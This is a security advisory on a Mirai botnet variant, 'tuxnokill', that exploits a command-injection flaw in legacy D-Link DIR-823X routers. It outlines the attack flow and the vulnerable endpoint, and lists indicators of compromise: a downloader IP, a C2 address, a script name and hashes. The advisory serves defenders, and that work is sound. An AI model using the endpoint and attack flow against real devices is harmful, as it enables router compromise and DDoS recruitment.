Active Mirai Botnet Campaign Exploits D-Link Router Vulnerability
Researchers have identified an active campaign leveraging the Mirai botnet that exploits CVE-2025-29635, a command-injection vulnerability present in legacy D-Link DIR-823X routers. This vulnerability allows attackers to undermine internet-exposed devices and recruit them into a distributed denial-of-service (DDoS) botnet through a variant of Mirai called “tuxnokill.”
The campaign focuses on the exploitation of CVE-2025-29635, which is characterized as an OS command injection vulnerability with a CVSS score of 7.2, indicating high severity. The attack method involves sending a specially crafted POST request to a specific endpoint of vulnerable routers, allowing attackers to execute arbitrary commands through a lack of input sanitization. Once an initial breach occurs, the attacker downloads a shell script named dlink.sh, leading to the installation of the Mirai malware and transforming the router into a botnet participant.
Automated exploitation of the vulnerability poses significant risks, as any vulnerable router connected to the internet can be compromised without user intervention. The malware is capable of infecting devices with various CPU architectures thanks to its compilation for ARM, MIPS, x86, and x86_64, further broadening the scope of its impact across diverse IoT environments. Once executed, the malware decodes its configuration and establishes communication with a command-and-control server, facilitating the orchestration of DDoS attacks.
Defensive Context
Organizations managing network infrastructure featuring D-Link DIR-823X routers must recognize the imminent threat posed by this botnet activity. Those operating these routers, especially in environments with direct internet exposure, are particularly vulnerable and should prioritize immediate action. Conversely, enterprises utilizing routers not affected by CVE-2025-29635 or whose devices are already behind robust security measures likely do not need to take specific actions at this time.
Why This Matters
The campaign underscores a sustained risk for networks that rely on outdated or unsupported hardware, particularly where essential security updates are absent. Organizations still deploying these D-Link devices face a pronounced likelihood of compromise, particularly those that have not implemented isolation strategies for IoT devices.
Defender Considerations
Organizations should monitor for any outbound connections to 88.214.20.14 and 64.89.161.130. Detection practices should include inspection of the environment for suspicious shell script execution and unusual outbound communication patterns associated with flooding behaviors prevalent in Mirai-driven activities. Notably, dlink.sh and other related scripts should be flagged for review to identify potential compromise.
Indicators of Compromise (IOCs)
- Downloader IP: 88.214.20.14
- C2 Server: 64.89.161.130:44300
- Malware Name: tuxnokill
- Download Script: dlink.sh
- Vulnerable Endpoint: POST /goform/set_prohibiting
- SHA256 Hashes:
- 72eff03b8573329818b38185074aa763e99d15f5709fecc44f9afece21dc06d8
- 32ca4b70e84787144574bfdb85a0092f3ebf524bb78febdd28d4c832b53fe100
- be902e86ec68515e23a3387a21e80d098d258223ce562598c27ee6d89b83ff2b
- d232c0960f24ba4bb369821b1bf2836d9e576a34fa3ddca2618c80b2f54277f7
- 7792f5c1d5c6c6415732ba0f63328549e19cc9c182c258c17b97b77fdb5541b8
